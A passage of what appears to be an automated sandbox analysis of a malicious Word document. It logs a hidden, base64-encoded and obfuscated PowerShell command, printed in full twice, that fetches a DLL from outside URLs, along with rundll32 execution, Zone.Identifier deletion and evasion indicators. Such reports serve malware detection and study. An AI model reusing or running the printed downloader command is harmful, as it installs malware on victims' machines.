wArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: J70H.dll.5.drStatic PE information: real checksum: 0x60901 should be: 0x5b1fb
Source: J70H.dll.5.drStatic PE information: section name: .text4
Source: J70H.dll.5.drStatic PE information: section name: .text5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001698 push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001113 push esp; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001823D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0017388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00173A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00173272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00174BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001723D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00173A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00173272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00174BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001723D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001823D7 push cs; iretd

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.gloJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Aanys\cokk.vuq:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2584Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
